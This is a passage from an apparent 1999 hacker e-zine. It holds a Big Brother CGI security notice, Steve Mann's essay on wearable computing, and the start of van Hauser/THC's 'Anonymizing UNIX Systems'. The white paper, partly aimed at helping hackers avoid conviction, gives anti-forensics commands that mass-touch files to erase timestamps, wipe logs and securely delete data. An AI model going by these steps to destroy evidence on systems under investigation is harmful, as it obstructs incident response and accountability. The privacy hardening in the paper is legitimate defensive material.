Date: Mon, 26 Apr 1999 06:49:59 -0400
From: Sean MacGuire <sean@WWW.MACLAWRAN.CA>
To: BUGTRAQ@netspace.org
Subject: FW: Security Notice: Big Brother 1.09b/c
http://www.maclawran.ca/bb/ for more info on Big Brother.
-----FW: <199904261049.GAA07967@www.maclawran.ca>-----
Date: Mon, 26 Apr 1999 06:49:59 -0400 (EDT)
>From: Sean MacGuire <sean@www.maclawran.ca>
To: solo@dok.org
Subject: Security Notice: Big Brother 1.09b/c
This notice concerns the Big Brother System and Network Monitor.
We noticed you downloaded a version which could be affected by
this problem so we wanted to tell you about it.
If you have any questions or concerns, feel free to contact me
at mailto:sean@maclawran.ca. Sorry for any inconvenience.
===========================
Big Brother Security Notice
===========================
Versions: 1.09b and 1.09c
Module: CGI History module (web/bb-hist.sh)
Affects: Anyone who's installed the new history viewer
bb-hist.sh as a CGI program.
Summary: Exploiting the problem could allow the partial
display of local files provided they are readable
by your web server, and text-based.
Fix: Please pick up a new version of the bb-hist.sh file
at: http://maclawran.ca/bb-dnld/bb-hist.sh
Found by: Michael Smith <michael@csuite.ns.ca> Thanks Michael.
I've also updated the archive to be 1.09d (this is the only
change).
--
Sean MacGuire, Reality Engineer sean@MacLawran.ca
The Big Brother Ministry of Truth http://maclawran.ca/sean
icbm --> 45'31.06N-73'35.19W +1 514 982 9688
"Looking down the barrel of another day"
--------------End of forwarded message-------------------------
@HWA
20.0 Cyborg Seeks Community
~~~~~~~~~~~~~~~~~~~~~~
May/June 1999 - Original URL - http://www.techreview.com/articles/may99/mann.htm
Cyborg Seeks Community
Meet one of the creators of wearable computing and join him in his search for like-minded folks to live in an augmented reality.
By Steve Mann
People find me peculiar. They think its odd that I spend most of my waking hours wearing eight or nine
Internet-connected computers sewn into my clothing and that I wear opaque wrap-around glasses day and night, inside
and outdoors. They find it odd that to sustain wireless communications during my travels, I will climb to the hotel roof to
rig my room with an antenna and Internet connection. They wonder why I sometimes seem detached and lost, but at
other times I exhibit vast knowledge of their specialty. A physicist once said he felt that I had the intelligence of a dozen
experts in his discipline; a few minutes later, someone else said they thought I was mentally handicapped.
Despite the peculiar glances I draw, I wouldnt live any other way. I have melded technology with my person and
achieved a higher state of awareness than would otherwise be possible. I see the world as images imprinted onto my
retina by rays of light controlled by several computers, which in turn are controlled by cameras concealed inside my glasses.
Every morning I decide how I will see the world that day. Sometimes I give myself eyes in the back of my head. Other days I add a sixth sense, such as
the ability to feel objects at a distance. If Im going to ride my bicycle, Ill want to feel the cars and trucks pressing against my back, even when they are
a few hundred feet away.
Things appear different to me than they do to other people. I see some items as hyperobjects that I can click on and bring to life. I can choose
stroboscopic vision to freeze the motion of rotating automobile tires and see how many bolts are on the wheels of a car going over 60 miles per hour, as
if it were motionless. I can block out the view of particular objectssparing me the distraction, for example, of the vast sea of advertising around me.
I live in a videographic world, as if my entire life were a television show. And many people assume that by living my life through the screen, I do exactly
what television leads us to dotune out reality. In fact, WearComp has quite the opposite effect: Visual filters help me concentrate on what is
important, heightening my sensitivity and setting my imagination free. I do of course have occasion to remove my computational prostheses, as when I
sleep, shower or splash around in the ocean.
In addition to having the Internet and massive databases and video at my beck and call most of the time, I am also connected to others. While I am
grocery shopping, my wifewho may be at home or in her officesees exactly what I see and helps me pick out vegetables. She can imprint images
onto my retina while she is seeing what I see. I hope to add to the population of similarly equipped people; last fall at the University of Toronto, I taught
what I believe to be the worlds first course for cyborgs (see sidebar School for Cyborgs).
Much of my passion has been fueled by a desire to restore some balance of privacy in a world where individuals are increasingly affronted by
government surveillance and corporate encroachments. In fact, one goal of my work was to challenge the notion of totalitarian video surveillancethe
now-common practice of a corporate or governmental establishment wishing to know everything about everyone in the establishment while revealing
nothing about itself. Many department stores, for example, use large numbers of hidden cameras and yet prohibit customers from taking pictures.
I attempted to draw attention to this phenomenon of unreciprocated video surveillance in Shooting Back, a documentary I made during my day-to-day
life in several different countries over a period of many years. Whenever I found myself in a store or some other establishment with electronic eyes
perusing the premises, I asked its management why they were taking pictures of me without my permission. They would typically ask me why I was so
paranoid and tell me that only criminals are afraid of cameras. Of course I was covertly recording this response using my own hidden eyetap video
camera. Then I would pull an ordinary camcorder out of my satchel and give them a chance to explain their position for the record. (The camcorder
was simply a prop, of course, as the eyetap camera had been capturing the scene.) The same people who claimed that only criminals were afraid of
cameras had an instantly paranoid (and sometimes violent) reaction to my camcorder. Shooting Back was, I believe, the first documentary to be
transmitted in real time to the World Wide Web while it was shot. (Selected portions of Shooting Back may be viewed at
http://wearcam.org/shootingback.html.)
Ahead of My Time
Growing up during the 1960s and early 1970s, I always seemed to be creating things before their time. I grew up in Hamilton, Ontarioa city on the
western tip of Lake Ontario about 100 kilometers from Toronto. I came by this inclination naturally; during the early 1950s, my father had built what
was perhaps the first wearable radio. (He had pursued radio as a hobby since his childhood.) He had taught me quite a bit about electronic circuits by
the time I started kindergarten. As a young child, I removed the head from a portable battery-powered dictating machine and replaced it with the head
from a high-fidelity audio cassette deck. From this cassette transport mechanism, I built a system that enabled me to listen to music while walking
around. While many people scoffed at this invention, I found it nice to be able to drown out background music while shopping, to assert my own idea
of personal space, and to defend myself from theft of my solitude by the department stores with their Muzak.
In my teens I founded a concept of mediated reality, which I called lightspace. The goal of lightspace was to experience an altered perception of
visual reality by exploring a large range of possible forms of illumination while observing a scene or object from different viewpoints. My work with
lightspace led to the invention of my wearable computer. My desire to create photographic instruments that would function as true extensions of my
mind and bodyand my desire to control these photographic instruments in new wayscreated a need for the ability to program complex sequences
of events.
I began to take this matter seriously, building a digital computer from a large number of electronic components salvaged from an old telephone switching
computer. I did much of this experimentation in the basement of a television repair shop where I spent much of my childhood as a volunteer, fixing TV
sets. In this shop I built up a great deal of knowledge about electronic circuits.
The result of my early efforts was, in the early 1970s, a family of wearable computers I called WearComp0. Sometimes I took these cumbersome
prototypes outside in search of spaces dark enough to explore the altered perception of visual reality I could create using portable battery-powered
light sources. People would cross the street to avoid me, not knowing what to make of what must have looked to them like an alien creature. The rig
was physically a burden, weighing as much or more than I did. After wearing one of these encumbrances from sundown (when it got dark enough to
use them) to sunrise, my feet would be swollen, blistered and bleeding.
I continued to refine WearComp0 and its evolutionary successor, WearComp1. After much tinkering, I came up with WearComp2my first system
that truly qualified as a wearable computer in the sense that it was not just a special purpose device. WearComp2 was field programmable, with a
full-function input device (a keyboard and joystick for cursor control both built into the handle of an electronic flashgun), text and graphical displays,
sound recording and playback (crude, home-brew analog-to-digital and digital-to-analog converters), and a wireless data connection to provide links
to other computers. I completed this system in 1981, before most of the world realized that computers could be portable, much less wearable.
Though an advance over my earlier prototype, WearComp2 was still a burden to lug. I wanted to reduce its bulk and make it
look more normal. This goal led me in 1982 to experiment with building components directly into clothing. I learned how to
make flexible circuits that could be embedded into ordinary fabric. This work enabled me to make versions of WearComp
that were not only more comfortable to walk around in but also less off-putting to others.
In spite of these advances, my life as a cyborg remained mostly solitary. I did connect quite literally (by serial data cable) with
an understanding woman during my freshman year at McMaster University in my hometown of Hamilton. We faced unusual
challenges in this configuration, such as having to choose which public restroom to use when we were joined. Thinking back,
I imagine we must have made a comical sight, trying to negotiate doorways without snagging the cable that tethered us
together.
Such relationships were rare, and it was seldom that I could get others to wear my seemingly strange contraptions. Many people were unable to get
past my technological shell, which they apparently found more than a little odd. Still, multimediated reality had provided me with a unique vision of the
world, and by the mid-1980s I had a following of people on the fringes of society who shared (or at least appreciated) my vision. I was invited to shoot
pictures for album covers and hair ads. By 1985, I began to realize that it wasnt just the finished photographs people wanted; they also seemed to
enjoy watching me take the pictures. Often I would be shooting in large warehouses, with audiences of hundreds of people. I began to realize that I had
become a cyborg performance artist. By the end of the 1980s, however, I found myself yearning to return to my more substantive childhood passions
for science, mathematics and electrical engineering.
While at McMaster, I added biosensors to the WearComp so that it could monitor my heart rate (as well as the full EKG waveform) and other
physiological signals. I also invented the vibravesta garment studded with radar transceivers and vibrating elements. Wearing this vest made objects
at a distance feel as if they were pressing against my body. I could close my eyes and walk down the hallway, confident that any wall or other obstacle
would be felt as warning vibrations on the appropriate side of the vest. By sparing myself from the cognitive load of processing all that visual
information, I found I was able to think more clearly.
In 1991, I brought my inventions to MIT as a PhD student. As a cyborg, uprooting myself from Canada was a formidable task, since I had installed my
cyberbody in Canada over a period of many years. Going to MIT was a sudden move of my extended self.
First, I secretly climbed up onto the rooftops of buildings around the city to put in place the wireless data communications infrastructure I had brought
with me from Canada. I had to quickly deploy my base stations at the top of elevator shafts or anywhere else I could find warm dry places. This way,
whenever I wanted an Internet connection, these gateways would be ready to send the data to me, no matter where I waseven if I was in a basement
or riding on the subway.
Although I kept in touch with my family through cyberspace, my first two years at MIT were lonely times IRLin real life. I was, after all, the only
person there with a wearable computer. Then in 1993, at the request of a fellow student, a local engineer named Doug Platt built a wearable system. I
was no longer the only cyborg at MIT.
It took some years to get other cyborgs at MIT, thus enabling the beginnings of a sense of community. Although I never succeeded in getting a large
community outfitted with my high-speed packet radio systems, the cellular telephones that began to emerge provided another answer to the problem of
connectivity.
By the end of 1995, my work was attracting serious academic interest. I was asked to write an article about my work for IEEE Computer, a
publication of the Institute of Electrical and Electronics Engineers Computer Society. I also proposed an academic symposium on wearables and was
referred to T. Michael Elliott, executive director of the Computer Society. I figured that such a conference would legitimize the field, which until then
had consisted in many peoples minds of Steve, that crazy guy running around with a camera on his head. Elliott was enthusiastic about the idea and in
1996 the Computer Society responded with an overwhelming yes. This marked a turning point in my acceptance by my professional peers.
More than 700 people attended this first IEEE-sponsored symposium on wearable computing, held in Cambridge, Mass., in October 1997. A gala
Wearables event the following day drew 3,000 people. In that same year I received my doctorate from MIT in wearable computing. This was a
gratifying culmination: I had turned a childhood hobby and passion into an MIT project, the topic of a conference, and a PhD dissertation.
This past year I returned to Canada to pursue my work at the University of Toronto. Why Toronto? I had lived there in the mid-1980s, and the city
had seemed very cyborg-friendly. I had sensed there a cosmopolitan diversity as well as a genuine warmth and openness that contrasted with the
more cyborg-hostile and tense atmosphere of some large U.S. cities.
Wearing Well
Although I spent many years developing WearComp in relative isolation, I welcome efforts to commercialize wearable computers. At the vanguard is
Xybernaut, based in Fairfax, Va. Xybernauts latest model is being manufactured by Sony, indicating that the Japanese electronics giant has an interest
in what some believe will become the Walkman of computing. Last May, Xybernaut organized its own conference on wearable computing (and invited
me to give the keynote address). I may also begin to license some embodiments of my original WearComp, as well as many of my more recent
innovations, to companies who want to manufacture commercial systems. I think it will be especially important to make the cyborg outfit less
cumbersomesomething thats long been a goal of mine. My latest version is quite sleek, and looks just like ordinary bifocal eyeglasses, with the
eyetap point hidden along the cut line. Even when fully rigged, I can still play an acceptable game of squash.
I realize that some people see me and my invention as a potential threatlike the Borg of Star Trek fame: You will be assimilated. Clearly, there are
important philosophical issues to be explored. Not only is there the danger of the technology being used to monitor people to make them into obedient
productive cyborgs, but there is also the potential that people will become too dependent on this technology. My goal as a responsible inventor and
engineer, however, has always been to encourage the development and manufacture of wearable computers as a means of personal, not institutional,
empowerment. That will make worthwhile all the obstacles and challenges I have faced during my more than 20 years of developing this technology.
I hope that if I bring WearComp to market, anyone who wishes to will eventually be able to become a cyborg. Well live in a collaborative
computer-mediated reality that will allow us to no longer need to distinguish between cyberspace and the real world. And then this cyborg will have lots
of company.
Steve Mann is a professor of electrical and computer engineering at the University of Toronto.
Links
Wearcomp.org: This is ground zero for Steve Manns world of wearable computing. It includes links to his papers and conference presentations,
as well as photos of his present and early wearable gear.
http://www.wearcomp.org/
The MIT Wearable Computing Web site. Information on MITs work as well as a good set of links to other organizations, both commercial and
academic.
http://wearables.www.media.mit.edu/projects/wearables/
Wearable Computer Systems at Carnegie Mellon University.
http://www.cs.cmu.edu/afs/cs.cmu.edu/project/vuman/www/home.html
Augmented reality research at Columbia Universitys computer graphics and user interfaces lab.
http://www.cs.columbia.edu/graphics/
Georgia Tech wearables page.
http://wearables.gatech.edu/
International Symposium on Wearable Computers (ISWC). Archives of ISWC97 and ISWC98, and information about the upcoming ISWC99.
http://iswc.gatech.edu/
Wearables research at the University of Washington's Human Interface Technology (HIT) Lab.
http://www.hitl.washington.edu/projects/wearables/
University of Oregons wearable computing research group.
http://www.cs.uoregon.edu/research/wearables/Oregon/
Xybernauts home page.
http://www.xybernaut.com
Wearable Webcrawler: This "wearable specific search index" is a comprehensive set of links to wearable computing resources on the Web.
http://wearables.gatech.edu/webcrawler.htm
Wearables Central: Contains archives of the Usenet newsgroup comp.sys.wearables and of the mailing list Wear-Hard@haven.org.
http://wearables.blu.org/
Sidebar:
20.1 School for Cyborgs
~~~~~~~~~~~~~~~~~~
Engineering students cross the human/machine gap or do they?
By Steve Ditlea
The black sunglasses perched on Steve Manns forehead provide a rare tinge of
high-tech glamour in a drab classroom in the University of Torontos Department of
Electrical & Computer Engineering. Wearing a ribbed red-and-gray sweater, Mann
appears, to a casual observer, quite normal. And the class he teachesECE 1766:
Personal Imaging and Photoquantigraphic Image Processingseems ordinary. Youd
never know the 20 students were recruited via a campus flyer bearing the headline: YOU
WILL BE ASSIMILATED. BECOME THE WORLDS FIRST CYBORGS.
For anyone weaned on TVs latter-day Star Trek series and their vision of
half-computer/half-humans losing their individuality to the collective consciousness known as the Borg, the notion of
being absorbed into a computer-mediated entity terrifies and fascinates. As the pioneering class on becoming a cyborg,
this one-semester offering for graduate students and fourth-year undergrads has attracted a smattering of casually
dressed men and one woman. The polyglot group includes students from Germany and Iran, as well as Canadians with
family ties to Asia and the Middle East. It is, in fact, the embodiment of Star Treks multiethnic ethos.
Wearable PCs, brick-sized, with awkward monocular head-mounted displays, rest on the desks of just two
studentsthe only overt sign that this may be a milestone of human-computer interaction. The wearable
computerscommercially available systems on loan from manufacturer Xybernautare curiosities on a campus more
familiar with notebook and palm computers. As students concentrate on their teachers words, no wearables are
actually in use.
Or so it seems. But look more closely at Mann and you see more than a dozen bulges straining the fabric of his striped
sweater, like some Alien-movie spawn about to burst from his body. He trails a gray cable, an old-fashioned plastic
rocker switch, some black, red and gray wires, and a miniature keyboarditems that just miss getting caught on the
edge of his desk as he paces on and off the dais. Under his sweater Mann wears a lightweight wearable computer of his
own design, wirelessly linked to the Internet and to his documents, which he can access in a screen hidden behind his
glasses. In his computer-ready state, Mann is the only cyborg in the roomthe master imparting esoteric knowledge to
a new generation, knowledge that will allow them to become cyborgs, too.
For a few hours the previous week everyone in the class wore Xybernaut computers as they participated in what Mann
calls their first project as a community of cyborgs. Linked by a few cell phones, this pod of borgs toured the campus,
capturing images using Manns lightspace photographic technique.
Next week, for the courses open eye final exam, students are to wear Xybernauts as an aid for calculations, as a
memory prosthesis, etc., according to the paper he hands out. Mann adds: This may well be the worlds first exam
involving the testing of a class of cyborg entitieshumans and computers, inextricably intertwined.
Grand thoughts, but here in the classroom, the cyborg vision has run into hard-edged reality. The Xybernaut systems,
designed originally for defense and industrial applications, arent really all that wearableat least, not comfortably for
more than minutes at a time. Its bulky, its heavy, says fourth-year undergrad Greg Harmandayan. Classmate Daniel
Friedmann concurs: What you wear on your waist and this head-mounted display isnt what I thought of as being
completely wearable. Special student Stephen Ross, on a break from his full-time job, complains that the equipments
battery life is too short to allow us to go online for any extended amount of time.
Not only does the hardware fall shortthere are some human deficits as well. In winnowing down 40 applicants for the
class, Mann insisted on knowledge of computing fundamentals. He later explains: I said right up front that to succeed at
this class, people better not be afraid of mathematics or of operating systems, getting down and dirty with the kernel.
Unfortunately, the students who take the class are accustomed to Windows-based computer systems, and have
required several weeks to acclimate themselves to the do-it-yourself tweaking of Linux, Manns operating system of
choice for his and his students wearables. (A Xybernaut PC runs uncomfortably hot with Windows, remaining
considerably cooler with Linuxs more efficient code.) But the delay in Linux literacy slows Mann down, leaving him
unable to cover as ambitious a syllabus as he would like during limited class hours.
When Mann teaches the course this summer in an immersion-intensive form, he plans to avoid both problems. I might
say as a prerequisite that youve already got to be a cyborg with your own equipment. I would take 20 or 30 people
from around the world who are already cyborgs. And when ECE 1766 starts again in the fall, Mann expects students
to be issued Xybernauts next generation of wearablesfaster, more compact systems manufactured through an
arrangement with Sony.
For Mann, though, the computing hardware is incidental to a wider vision of humanistic intelligenceof
computer-complemented humans in a multimedia world. Wearable computing is meaningless in and of itself, he says.
As he sees it, the personal computing applications of wearables stressed by commercial manufacturers such as
Xybernaut are a mere subset of the visual recording, interpretation and augmentation functions of his own systems.
Having spent much of his life achieving oneness with his machine, Mann sometimes seems to forget how remarkable his
accomplishment is. How to be a cyborg is a totally boring concept, he insists. The fundamental mathematical basis
behind it makes it interesting. Otherwise, its not much of a course.
Despite the doubts about their comfort and practicality, 16 of the 20 Xybernaut computers signed out by ECE 1766
students remain at large following completion of the course. Several students are exploring the possibility of graduate
study with Mann. Almost all have been marked for life. They have been assimilated.
Steve Ditlea is a contributing writer for Technology Review.
@HWA
21.0 Anonymizing UNIX systems white paper by van Hauser/THC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---[ Anonymizing UNIX Systems ]---
version 0.7
Author: van Hauser / THC
I. THE AUDIENCE
II. GOAL
III. PREREQUISITES
IV. USER DATA
1. Sensitive user data
2. Protecting /home directories
3. Traceable user activity
4. Protecting /var/spool/mail/user files
V. SYSTEM DATA
1. Sensitive system data
2. Traceable system activity
3. Logging - important and dangerous
4. Protecting system configs
5. Computer Memory and sensitive /proc interfaces
VI. DELETE(D) DATA AND SWAP
1. How to delete files in a secure way
2. How to wipe free disk space
3. How to handle swap data
4. How to handle RAM
5. Temporary data - it is evil
VII. NETWORK CONNECTIONS
VIII. HIDING PRIVACY SETTINGS
1. Mount is your friend
2. Removable Medias
3. ???
IX. EXAMPLE CONFIGURATION AND SCRIPTS
X. FINAL COMMENTS
1. Where to get the tools mentioned in this text
2. Additional thoughts
3. Greetings (what would the world be without greets?)
4. How to contact me for updates or comments
--------------------
* I. THE AUDIENCE
This text is for any human being out there who wishes to keep their data and doings private from any snooping eye - monitoring network traffic and stealing/accessing
the computer including electronic forensics. Hackers, phreakers, criminals, members of democracy parties in totalitarian states, human rights workers, and people
with high profiles might be interested in this information. It was especially written for novice hackers so they are not so easily convicted when busted for their early
curiosity.
Thanks to Solar Designer, Fyodor, typo, tick, pragmatic, mixter and doc holiday for comments, critics and ideas.
Special thanks to rookie who had the original idea writing this paper but through personal problems couldn't do it himself.
* II. GOAL
Our goal is to provide solutions to the following statements:
(1) The solution should be simple and easy
(2) All user data should be inaccessible by anyone except their owner
(3) Nobody should be able to reconstruct what is happening on the system
Maybe you see contradictions ;-)
* III. PREREQUISITES
It is important to state the prerequisites for this project:
- The system should be secure. No remote vulnerabilities (and hopefully no local ones either)
- The system administator(s) must be trusted and willing to set this up
- The operating system to achieve this is a UNIX
Note that the solutions presented do not 100% fit internet servers.
However it's (nearly, bah ;-) perfect for enduser systems.
For the UNIX part, we show the solutions for Linux because it is the unix most easily for beginners to get their hands on and administrate.
The Linux distribution we use is the SuSE Linux Distribution 6.0
Debian is better but more complicated for beginners. And I dislike redhat for it's missing security.
You should know enough about unix (what is portmap, mount, rc2.d etc.) before trying to understand this text. It's *not* a Linux-Howto!
* IV. USER DATA
*** 1. Sensitive user data
What is sensitive user data? Well *any* data from a user account. This includes:
- utmp/wtmp/lastlog data (login times and duration plus login hosts)
- history files (what commands you typed in your session)
- your emails
- temporary files from applications like mailers, browsers etc.
- applications and their configuration
- your own data (documents, porn pics, confidental data)
- time stamps on your data (when were you accessing/editing which data)
- on multiuser systems: what users CURRENTLY are doing.. this includes process listing, and network connections as well as utmp (which is already covered
by another category). -> make proc more restrictive.
We are trying to protect all this data.
Note that utmp/wtmp/lastlog data and mail (mqueue/mail/fax/lpd) is handled in the SYSTEM DATA section.
Note that all user accounts can be seen from /etc/passwd ;-) So maybe you'd like to add some/many fake accounts, together with homedirs and crypted data ...
*** 2. Protecting /home directories
Most important for protecting user data is protecting the users' /home directories.
Each home directory must be encrypted with a strong cypher so that even with full physical access to the system the data can't be obtained. Currently I know of only
one software provididing a solution to our requirements: CFS - the cryptographic filesystem.
There are also some other crypto solutions available : TCFS, SFS and the loop filesystem with crypt support. They are faster but have got the disadvantage that
you'll have to recompile your kernel with patches from these tools. So for the sake of easeness, I stick with CFS here. (Pointers to all tools mentioned in this text can
be found at the end)
To enable CFS we must put these six lines in a rc2.d script:
portmap
rpc.mountd -P 894 # mountd should bind to port 894
cfsd 895 # cfsd should bind to port 895
rm -rf /tmp/.tmp
mkdir -p -m 700 /tmp/.tmp
mount -o port=895,intr localhost:/tmp/.tmp /home
Additionaly we have to put this entry into /etc/exports:
/tmp/.tmp localhost
Okay. This starts the sunrpc with the mountdaemon which are necessary for CFS to be started and used.
Now we need to get the following going: if a user logs on, the system has to check if he's already logged in to decide whether to decrypt the users' home directory.
This sounds hard but is easy: the user's /home/user directory doesn't exist (even if it would, because of mount command nine lines above would make it nonexistent),
so the user's HOME variable is set to '/' the root directory. Then his login shell is started which looks for it's start scripts. And that's were we put our hooks in.
We create (this example is for bash) the file /.profile with the following contents:
cattach /crypt/$USER $USER || exit 0
export HOME=/home/$USER
cd $HOME
if test -f $HOME/.profile; then
. $HOME/.profile
fi
When a user logs on the first time, this script will be executed. The user has to enter the password for his crypted homedir, and after this his correct HOME variable
is set and the normal login profile is read and done. If a user doesn't know the passphrase for his crypted homedir, he is logged out.
But how do we remove the decrypted homedir after the user logs out? This script should be clever, because a user could be logged in several times at once, and it
should only be removed when the last loginshell exits.
Thank god, this is easy too, we create a /home/user/.bash_logout script:
# if the number of user's login shells are > 3 then this is the last.
shells=`ps xu | grep -- "$USER .* S .* -[^ ]*sh" | wc -l`
test $shells -lt 3 || exit 0
export HOME=/
cd /
cdetach $USER
Thats all. From now on, the users' homedirectories are safe.
Note that a user can't login now, start a background job which writes data in his homedirectory and log out because his homedirectory would be removed. The full
.bash_logout script I provide in (see two lines below) checks for a $HOME/.keep file and if present doesn't remove the homedir.
For network logins you should keep in mind that they should not be done via rlogin, telnet, etc. because they send all traffic (including passwords) in plaintext over
the network. You should use a tool which encrypts the whole traffic like SSLtelnet or SSH (for SSH you need to set "UseLogin yes" in the /etc/sshd_config file).
You'll find all these scripts with error checking, user creating, stop scripts and config files etc. in section IX. EXAMPLE CONFIGURATION
Note that we started daemons in the section which can be contacted from remote. If you don't want this (because there are no external users who need to mount
their crypted user data on their own machine) you should firewall these ports. Look in you manpages ("man ipchains" or "man ipfwadm").
*** 3. Traceable user activity
[Warning, this section shows first how to perform simple electronic forensics]
It is easy to see who logged on the system and what he did by the timestamps. Even if all your data is crypted, by checking the last access time (atime) of your files,
someone may check when you logged in last time, for what duration and if you were idleing or doing much stuff.
If the systems doesn't have many users, someone might even tell what you did.
Example: The earliest access time for a crypted file in your homedir can be seen by:
ls -altur /crypt/$USER | head -1 # shows the logout file
ls -altu /crypt/$USER | more # with some brain you'll find
# the login time
then you also have the duration of the session.
By checking the change/modification and access time of those crypted files with their timestamps someone can see how hard you were working, and get more
conclusions (e.g. if many files nested in a three levels deep directory where modified this is probably a browser - so you were surfing the net).
This insight will now make it possible to check what commands were run:
Let's say the login time as 22 hours ago, so you run:
find / -type f -atime 0 -ls # shows the accessed files
find / -type f -mtime 0 -ls # shows the modified files
(this can be done with directories too)
Now check the output for the correct timeframe and analyze what you found. e.g. the telnet client was accessed. So it's probable, the user used it to connect to
another system. I think you can imagine now what is possible.
To protect against this is also very easy:
Create the file /usr/local/bin/touch_them and make it executable with the following contents:
find /crypt /tmp /etc /var/spool 2> /dev/null | xargs -n 250 touch
Then put the following line into /etc/crontab:
50 * * * * root /usr/local/bin/touch_them
finally you change the 4th row of all lines in /etc/fstab which have the keyword "ext2" in their third (the filesystem type) row:
defaults (or anything else)
should become
defaults,noatime (the old value is kept, and noatime is appended)
example:
/dev/hda1 / ext2 defaults 1 1
becomes
/dev/hda1 / ext2 defaults,noatime 1 1
What did we achieve? The crontab entry with the small script updates the atime, mtime and ctime to the current time every hour of special directories - especially
those which may hold user data.
The mount options we changed now prevent the update of the atime. However, this needs a current 2.2.x kernel - it isn't implemented on the 2.0 kernel tree!
*** 4. Protecting /var/spool/* files
/var/spool/mail :
Now it gets tricky. How can we protect the new mail for a user from spying eyes? It can't be sent directly to a user's homedir like qmail would do because it's
crypted. The easiest solution is to use pgp to encrypt your outgoing emails and tell all your friends that they should also encrypt all emails to you.
However, this is not satisfying. An attacker can still see who sent the user the email. The only possibility to hide this is using anonymous remailer. This is not a great
solution, so this is an open point (see section X.2: Additional thoughts)
/var/spool/{mqueue|fax|lpd} :
Well, all you can do is try to flush the queues when shutting down.
After that you have to decide if you delete the remaining files in a secure way or leave it where it is. Or program a special script which does something with the data
(like taring the data and encrypting it with pgp, doing the reverse when the system is rebooted)
You can also create a whole crypted /var partition, but that would require someone at the console while booting the system - every time.
* V. SYSTEM DATA
*** 1. Sensitive system data
What is sensitive system data? *Anything* which gives conclusion on incoming and outgoing data, configuration files, logs, reboots and shutdowns.
This includes:
- utmp/wtmp/lastlog data (boot, reboot, shutdown times + user times)
- ppp dialup script
- sendmail and tcp wrapper configurations
- proxy cache data (e.g. squid web/ftp proxy)
- syslog messages
- /var/spool/* data {mqueue|fax|lpd|mail}
- temporary files from daemons
- time stamps on data (when were what data accessed/edited)
How to prevent time stamp forensica, see section IV.3
How to protect /var/spool/* data, see section IV.4 for an incomplete solution.
*** 2. Traceable system activity
(prevent of time stamp forensic is handled in section IV.3) To trace system activity, you can easily check temporary files of daemons and applications. Some of them
write to /tmp, root applications usually (should) write to /var/run. We handle this together with section V.3: Logging. All you have to do is this, and only *once* :
cd /var
mv run log
ln -s log/run run
this moves the /var/run directory to /var/log/run and sets a symlink in it's former place so that applications still find their files.
*** 3. Logging - important and dangerous
Logging is important to trace problems like misconfigurations.
Logging is dangerous because an attacker can see important data in the logfiles, like the user's login and logout time, if they executed "su" or other commands etc.
We try to find a balance between this.
Our solution: Write all log data to one special directory.
This directory is a RAM disk so the data is lost after a system shutdown. Ensure that syslogd [/etc/syslog.conf] and daemons (e.g. httpd [apache]) only write to our
special logging directory or a system console. /var/log should be used as our special logging directory.
Now we put the following commands into /sbin/init.d/boot.local:
umask 027
mke2fs -m0 /dev/ram0 1> /dev/null 2>&1
rm -rf /var/log/* 2> /dev/null
mount -t ext2 /dev/ram0 /var/log
chmod 751 /var/log
cd /var/log
mkdir -m 775 run
chgrp uucp run
for i in `grep /var/log /etc/syslog.conf|grep -v '^#'| \
awk '{print $2}'|sed 's/^-//'`
do > $i ; done
umask 007 # 002 might be used too.
for i in run/utmp wtmp lastlog
do > $i ; chgrp tty $i ; done
cd /
kill -HUP `pidof syslogd` 2> /dev/null
After your next reboot it behaves like described above.
Some of you will not like the idea of having no logs after a reboot. This way you can't trace an intruder or guess from your logs what crashed the machine. Either you
can tar the files and pgp before the shutdown is complete (but the data would be lost if a crash occurs), or you might also use ssyslog or syslog-ng, special syslogs
with crypting capabilities, and write the data you really want to keep to (just an example) /var/slog.
You can also create a whole crypted /var partition, but that would require someone at the console while booting the system - every time.
*** 4. Protecting system configs
This is tricky. It is easy to achieve but for a price. If we create an account with uid which has his homedir in /home and is hence protected by our CFS configuration,
you need to be at the console at every reboot. This isn't practical for server systems that need to be administrated and rebooted remotely. This solution is only good
for end-user pcs.
Just create an account with the uid 0 (e.g. with the login name "admin"). You can use the create_user script from section IX.
Put all your sensitive configuration files you want to protect into this directory (ppp dialup scripts, sendmail.cf configs, squid configs with their cache directory set to a
subdir of "admin" etc.)
Now create a small shellscript which starts these daemons with a command line option to use the config files in your "admin" homedir.
Your system is then secure from extracting the sensitive information from the config files. But for a price. You have to log in after each reboot as user "admin", enter
your CFS passphrase and start the script.
*** 5. Computer Memory and sensitive /proc interfaces
For a real multiuser system on which the administrator want additionally ensure the privacy of the user online, he has to hide the user process information, a user
would normally see when issuing a "who" or "ps" command. To protect the user's process information, you can use Solar Designer's secure-linux kernel patch. To
protect the utmp/wtmp/lastlog we ensure that these files are only readable by root and group tty, hence a normal user can't access this data. (This is done in the
boot.local example script)
Now one problem is left. Even with normal RAM a well funded organisation can get the contents after the system is powered off. With the modern SDRAM it's
even worse, where the data stays on the RAM permanently until new data is written. For this, I introduced a small tool for the secure_delete package 2.1, called
"smem" which tries to clean the memory. This one should be called on shutdown. It is done in the example in section VI.4
* VI. DELETE(D) DATA AND SWAP
*** 1. How to delete files in a secure way<
When a file is deleted, only the inode data is freed, the contents of the data is NOT wiped and can be gathered with tools like "dd" or the tool manpipulate_data
from THC.
Peter Gutmann wrote a paper with the name "Secure Deletion of Data from Magnetic and Solid-State Memory" presented 1996 at the 6th Usenix Security
Symposium. This is the best civilian paper on how to wipe data in a way that it is hard for even electronic microscopes to regain the data.
There are four tools out there which uses the techniques described there, two called "wipe", one called "srm" from THC's secure_delete package and "shred" which
is part of the new fileutil package from GNU.
Ours is still the best from it's design, features and security, and it has also all important and advanced commandline options and speed you need.
To use one of these tools for deletion just set an alias in /etc/profile:
alias rm=srm # or wipe or shred
or even better, move /bin/rm to /bin/rm.orig and copy the secure delete program to /bin/rm. This ensures, that all data which is deleted via rm is securely wiped.
If you can't install THC's secure_delete package or any other (for any reason) you can also set the wipe flag from the ext2 filesystem on files you wish to wipe before
rm'ing them. It's nearly the same, but it's NOT a secure wipe like mentioned above. It's set by:
chattr +s filename(s)
[Note that it is *still* possible for a well funded organisation to get your data. Don't rely on this! See section VI.4 !]
*** 2. How to wipe free disk space
Most times applications like the editor in your mail program write a temporary file. And you don't know about it - you weren't even asked :( Because they don't wipe
the data in a secure way, an attacker can get all your private emails just because you didn't know. That's bad.
The solution: You use a wiper program which cleans all unused data from the disk partitions.
The only one available is the one from THC's secure_delete package. You could put "sfill" (that is what it is called) in you crontab so it is run regulary but this might
